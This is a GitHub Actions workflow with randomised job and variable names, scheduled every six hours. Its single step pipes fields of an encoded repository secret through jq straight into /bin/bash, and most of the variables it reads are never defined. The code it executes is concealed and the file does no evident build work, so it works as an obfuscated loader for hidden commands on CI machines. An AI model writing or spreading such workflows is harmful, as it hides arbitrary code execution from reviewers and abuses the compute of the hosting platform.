name: jiatingkai1638

on:
  workflow_dispatch:
  schedule:
    - cron: '46 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: jiatingkai1638
        env:
          uinm4717: ${{ secrets.uinm4717 }}
        run: |
          echo $uinm4717 | jq -r .bb0107 | /bin/bash
          echo $orxrx4920 | jq -r .p08 | /bin/bash
          echo $c36822 | jq -r .qg945 | /bin/bash
          echo $s9027 | jq -r .xd30 | /bin/bash
          echo $pnshc35556 | jq -r .rsr22 | /bin/bash
          echo $e9 | jq -r .oxxjn4 | /bin/bash
          echo $j22576 | jq -r .vri059 | /bin/bash
          echo $um99 | jq -r .iu18 | /bin/bash
          echo $ckxo7 | jq -r .cskcf00075 | /bin/bash
          echo $zr3620 | jq -r .k37 | /bin/bash
          echo $zdiuo3854 | jq -r .nahv4 | /bin/bash
          echo $pid9 | jq -r .xj5 | /bin/bash

